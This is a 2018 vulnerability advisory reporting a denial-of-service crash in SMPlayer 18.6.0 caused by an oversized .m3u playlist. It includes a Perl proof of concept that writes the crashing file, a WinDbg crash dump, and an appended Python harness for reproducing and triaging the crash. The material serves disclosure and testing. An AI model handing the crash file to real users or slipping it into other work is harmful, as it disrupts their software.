Document Title:
===============
SMPlayer 18.6.0 - Memory Corruption (DoS) Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2138

Release Date:
=============
2018-07-23

Vulnerability Laboratory ID (VL-ID):
====================================
2138

Common Vulnerability Scoring System:
====================================
4.4

Vulnerability Class:
====================
Denial of Service

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
SMPlayer is a free multimedia player for Windows and Linux with built-in codecs that can play virtually any video and audio format. It does not need any additional codecs. Install SMPlayer with ease and you'll be able to instantly play all audio and video formats without having to search for and install additional codecs.

(Copy of the Vendor Homepage: http://www.smplayer.info/)

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a memory corruption vulnerability in the official SMPlayer v18.6.0 software.

Vulnerability Disclosure Timeline:
==================================
2018-07-23: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A memory corruption vulnerability resulting in a denial of service has been discovered in the official SMPlayer v18.6.0 software.
The crash is an invalid pointer write that occurs while SMPlayer reads a malformed .m3u playlist: a single line of 122,200 bytes with no line terminator, as generated by the PoC below. Opening such a file crashes the whole smplayer.exe process (denial of service). The faulting instruction lies in the Qt5Core.dll bundled with SMPlayer (file version 5.6.0.0), reached from the playlist import path. Note that the debugger symbolizes the top frame as QTemporaryFile::createNativeFile(QFile&) from export symbols only and warns that stack unwind information is unavailable, so the function names in the stack below are indicative rather than authoritative; the exception record itself (a 16-bit store, `mov word ptr [edi+2],dx`, to the unmapped address 0x020ffffe) is reliable. No control over the written pointer or the stored value is demonstrated, so the impact claimed here is limited to denial of service.

Vulnerable Modules:
[+] Open
[+] File
[+] Reading

Proof of Concept (PoC):
=======================
The vulnerability can be triggered by a local attacker who imports the file, or by a remote attacker who convinces a user to open it. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC: Exploitation (Perl)

#!/usr/bin/perl
use strict;
use warnings;

# Build one 122200-byte line of "A" with no line terminator and write it out as
# Corruption.m3u. Opening this playlist in SMPlayer 18.6.0 triggers the crash.
my $Buff = "A" x 122200;
open(my $fh, '>', 'Corruption.m3u') or die "Cannot create Corruption.m3u: $!";
binmode($fh);
print $fh $Buff;
close($fh);
print "POC Created by ZwX\n";


--- PoC Debug Session Logs (Windbg) ---

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 68b724d9 (Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x000005f9)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 020ffffe
Attempt to write to address 020ffffe

FAULTING_THREAD:  00000994

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  smplayer.exe

FOLLOWUP_IP:
Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9
68b724d9 66895702        mov     word ptr [edi+2],dx

WRITE_ADDRESS:  020ffffe

ERROR_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text>

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  020ffffe

WATSON_BKT_PROCSTAMP:  5b2f993b

WATSON_BKT_PROCVER:  18.6.0.0

PROCESS_VER_PRODUCT:  SMPlayer for Windows (32-bit)

WATSON_BKT_MODULE:  Qt5Core.dll

WATSON_BKT_MODSTAMP:  5715839e

WATSON_BKT_MODOFFSET:  f24d9

WATSON_BKT_MODVER:  5.6.0.0

MODULE_VER_PRODUCT:  Qt5

BUILD_VERSION_STRING:  7601.24168.x86fre.win7sp1_ldr.180608-0600

MODLIST_WITH_TSCHKSUM_HASH:  ec621d6b16ea647fcad270b607987d6790c6372e

MODLIST_SHA1_HASH:
22b51cf1164db3537920237889937f627826c434

NTGLOBALFLAG:  70

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_TIME:  07-20-2018 16:01:44.0461

ANALYSIS_VERSION: 10.0.17134.12 x86fre

THREAD_ATTRIBUTES:
OS_LOCALE:  FRA

PROBLEM_CLASSES:

    ID:     [0n309]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x994]
    Frame:  [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile

    ID:     [0n282]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x994]
    Frame:  [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

LAST_CONTROL_TRANSFER:  from 68b552b9 to 68b724d9

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0022c968 68b552b9 00000023 0022ca38 0022ca08 Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x5f9
0022c9c8 68b72b3c 00000003 00000000 037ef398 Qt5Core!ZN5QFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x59
0022ca58 68b94738 0022cab8 0022cae0 00000000 Qt5Core!ZN14QTemporaryFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x2c
0022cae8 68b94d99 00000000 00000000 00666c30 Qt5Core!ZN9QSettings5eventEP6QEvent+0x378
0022cb18 00445290 0022cb7c 00000000 00000000 Qt5Core!ZN9QSettings5eventEP6QEvent+0x9d9
0022cba8 004502ad 0022cbdc 00000002 027b14d8 smplayer+0x45290
0022cc08 0046961a 027b4388 0022cd38 00000007 smplayer+0x502ad
0022cc88 0046ad1c 0022cd38 0022cd3c 00000004 smplayer+0x6961a
0022cd68 0046bfea 0022cdb8 00000000 0022cda8 smplayer+0x6ad1c
0022cdd8 68c15612 027b1430 00000000 00000022 smplayer+0x6bfea
0022ce78 004c08cc 027b8a48 00000007 00000000 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212
0022cf18 004c98e1 00000000 00000000 00000000 smplayer+0xc08cc
0022d058 004f97f0 0022d0ac 00000002 00686bc4 smplayer+0xc98e1
0022d0d8 00501901 0022d1a4 021d56f0 0022d128 smplayer+0xf97f0
0022d1d8 00523690 00000000 00000000 000002aa smplayer+0x101901
0022d228 68c15612 021d56f0 00000000 0000000b smplayer+0x123690
0022d2c8 00cb4238 02874d38 00000003 00000001 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212
0022d2f8 00e2bfb0 00000000 68d2c200 00000000 Qt5Widgets!ZN7QAction8activateENS_11ActionEventE+0x98
0022d398 00e2a9de 0022d3d0 00000000 00000420 Qt5Widgets!ZN5QMenu18setToolTipsVisibleEb+0x2a0
0022d3a8 77156370 00000000 00000000 000000dc Qt5Widgets!ZN5QMenu7hoveredEP7QAction+0xd1e
0022d498 00e360ba 0022d820 021574e8 0000000c ntdll!RtlpFreeHeap+0xb7a
0022d4a8 6aa8f5f1 021181e0 0000000c 0022d518 Qt5Widgets!ZN5QMenu5eventEP6QEvent+0x11a
0022d4b8 68a9e6af 0000001b 0371e2f8 00000010 qwindows+0xf5f1
0022d518 61b76f8b 0022d820 00000000 00000048 Qt5Core!ZN7QThread21setTerminationEnabledEb+0x4af
0022d538 00cbfcc1 028b7ae0 0022d820 0022d848 Qt5Gui!ZNK11QMouseEvent5flagsEv+0xb
0022d5a4 771c5c6e 02148bc0 00000001 00000000 Qt5Widgets!ZN12QApplication6notifyEP7QObjectP6QEvent+0xb51
0022d5d4 771c6c18 00360138 00000029 0000000f ntdll!RtlpValidateHeap+0x20
0022d678 61b69e7a 0212a8a8 00000000 00000000 ntdll!RtlDebugFreeHeap+0x276
0022d6a8 68bf5259 028b7ae0 0022d820 0022d77c Qt5Gui!ZNK7QWindow8geometryEv+0x1ba
0022d6f8 00cbe96c 028b7ae0 0022d820 02957d40 Qt5Core!ZN16QCoreApplication15notifyInternal2EP7QObjectP6QEvent+0x109
0022d898 00d1537a 0022dbb0 0022dbb0 00000000 Qt5Widgets!ZN19QApplicationPrivate14sendMouseEventEP7QWidgetP11QMouseEventS1_S1_PS1_R8QPointerIS0_Eb+0x1dc
0022d8c8 68bf4cef 00000000 03766523 00000000 Qt5Widgets!ZN14QDesktopWidget11qt_metacallEN11QMetaObject4CallEiPPv+0x48ba
0022fe38 005d7d52 00000001 02142fb8 009751a0 Qt5Core!ZN23QCoreApplicationPrivate29threadRequiresCoreApplicationEv+0xf
0022fe98 00635f1d 00400000 00000000 00962598 smplayer+0x1d7d52
0022feb8 004013e2 00363aa8 00000019 00000001 smplayer+0x235f1d
0022ff88 7560efac 7ffd3000 0022ffd4 77163628 smplayer+0x13e2
0022ff94 77163628 7ffd3000 77dd4275 00000000 kernel32!BaseThreadInitThunk+0x12
0022ffd4 771635fb 004014c0 7ffd3000 00000000 ntdll!__RtlUserThreadStart+0x70
0022ffec 00000000 004014c0 7ffd3000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  ad89141657ca48c6d034b3799d071b71260125cc

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  83a292b67a1ed4f6616c9779d9411dcb769f07bc

THREAD_SHA1_HASH_MOD:  87d5f5752469a4414a8f7facb8849b26ec792c75

FAULT_INSTR_CODE:  2578966

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Qt5Core

IMAGE_NAME:  Qt5Core.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5715839e

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_Qt5Core.dll!ZN14QTemporaryFile16createNativeFileER5QFile

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  Qt5Core.dll
BUCKET_ID_IMAGE_STR:  Qt5Core.dll

FAILURE_MODULE_NAME:  Qt5Core

BUCKET_ID_MODULE_STR:  Qt5Core

--------------------------------------

0:000> lmvm Qt5Core
start    end        module name
68a80000 68faf000   Qt5Core    (export symbols)       C:\SMPlayer\Qt5Core.dll
    Loaded symbol image file: C:\SMPlayer\Qt5Core.dll
    Image path: C:\SMPlayer\Qt5Core.dll
    Image name: Qt5Core.dll
    Timestamp:        Mon Apr 18 18:02:22 2016 (5715839E)
    CheckSum:         0052E947
    ImageSize:        0052F000
    File version:     5.6.0.0
    Product version:  5.6.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    Information from resource tables:
        CompanyName:      The Qt Company Ltd
        ProductName:      Qt5
        OriginalFilename: Qt5Core.dll
        ProductVersion:   5.6.0.0
        FileVersion:      5.6.0.0
        FileDescription:  C++ application development framework.
        LegalCopyright:   Copyright (C) 2015 The Qt Company Ltd.

Security Risk:
==============
The security risk of the memory corruption (an invalid pointer write triggered on playlist import) is estimated as medium.

Credits & Authors:
==================
ZwX - https://www.vulnerability-lab.com/show.php?user=ZwX

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish or trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
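Editor's note: the Perl PoC above writes a fixed 122,200-byte line, and the windbg dump is read by eye. The harness below is an added example written for this page, not the advisory's or the SMPlayer project's code. It reproduces the payload with a configurable size, launches the player on it and classifies the exit code, and pulls the fields that decide a first triage verdict out of a `!analyze -v` report. The executable path, the 30-second timeout and the list of report fields are assumptions; the sample report is a constructed excerpt trimmed from the advisory's own log.

```python
"""Reproduction and first-pass triage harness for the SMPlayer 18.6.0 .m3u crash.

Added example for this page; it is not the advisory's own PoC. Executable path,
timeout and the field list below are assumptions, not taken from the advisory.
"""
import re
import subprocess
import sys
from pathlib import Path

# NTSTATUS reported in the advisory's exception record (c0000005).
STATUS_ACCESS_VIOLATION = 0xC0000005


def build_poc(size=122200, filler=b"A"):
    """Same payload as the Perl PoC: `size` filler bytes and no line terminator.

    Keeping the terminator out matters: the file is one oversized playlist line,
    not a playlist that happens to contain a long entry.
    """
    return filler * size


def write_poc(path, size=122200):
    """Write the payload to `path` and return the number of bytes written."""
    data = build_poc(size)
    Path(path).write_bytes(data)
    return len(data)


def is_access_violation(exit_code):
    """True if a Windows process exit code carries STATUS_ACCESS_VIOLATION.

    A process killed by an unhandled exception exits with the NTSTATUS; Python may
    hand it back unsigned (3221225477) or signed (-1073741819), so mask to 32 bits.
    """
    return (exit_code & 0xFFFFFFFF) == STATUS_ACCESS_VIOLATION


def run_target(exe, poc_path, timeout=30):
    """Open the PoC in the player and return (crashed, exit_code).

    A healthy player keeps running, so reaching the timeout is read as "no crash"
    (assumption: 30 s is long enough for the player to load the playlist).
    """
    try:
        proc = subprocess.run([exe, str(poc_path)], timeout=timeout,
                              capture_output=True)
    except subprocess.TimeoutExpired:
        return False, None
    return is_access_violation(proc.returncode), proc.returncode


# `!analyze -v` fields that decide the first triage verdict (assumed list).
_FIELDS = ("EXCEPTION_CODE_STR", "DEFAULT_BUCKET_ID", "WRITE_ADDRESS",
           "READ_ADDRESS", "FAILURE_BUCKET_ID", "MODULE_NAME", "SYMBOL_NAME")


def triage_analyze(report):
    """Extract the key fields of a windbg `!analyze -v` report and rate the crash.

    The verdict is deliberately conservative: a write access violation is more
    interesting than a read, but without evidence of control over the pointer or
    the stored value it is still only a denial of service. A report carrying the
    "Stack unwind information not available" warning is flagged so nobody builds
    a root-cause story on a frame name that may be wrong.
    """
    fields = {}
    for key in _FIELDS:
        m = re.search(rf"^{key}:\s*(\S+)", report, re.M)
        if m:
            fields[key] = m.group(1)
    bucket = fields.get("DEFAULT_BUCKET_ID", "")
    if bucket.startswith("INVALID_POINTER_WRITE"):
        verdict = "write-AV: worth a closer look, DoS until pointer/value control is shown"
    elif bucket.startswith("INVALID_POINTER_READ"):
        verdict = "read-AV: treat as DoS"
    else:
        verdict = "unclassified"
    return {
        "fields": fields,
        "verdict": verdict,
        "stack_unreliable": "Stack unwind information not available" in report,
    }


# Constructed sample: a few lines trimmed from the advisory's own debugger log.
SAMPLE_REPORT = """\
ExceptionCode: c0000005 (Access violation)
DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE
WRITE_ADDRESS:  020ffffe
EXCEPTION_CODE_STR:  c0000005
MODULE_NAME: Qt5Core
SYMBOL_NAME:  Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9
FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_Qt5Core.dll!ZN14QTemporaryFile16createNativeFileER5QFile
WARNING: Stack unwind information not available. Following frames may be wrong.
"""

if __name__ == "__main__":
    # Usage: python harness.py [path\to\smplayer.exe]; the path is an assumption.
    poc = Path("Corruption.m3u")
    print("wrote", write_poc(poc), "bytes to", poc)
    if len(sys.argv) > 1:
        crashed, code = run_target(sys.argv[1], poc)
        print("crashed:", crashed, "exit code:", code)
    print(triage_analyze(SAMPLE_REPORT))
```

Run it with the path to smplayer.exe on a disposable Windows VM; without an argument it only writes the playlist and triages the embedded sample. The exit-code check is what turns a manual "the window disappeared" observation into something a CI job or a fuzzing loop can assert on, and the mask in `is_access_violation` avoids the common mistake of comparing against the signed value Python sometimes returns.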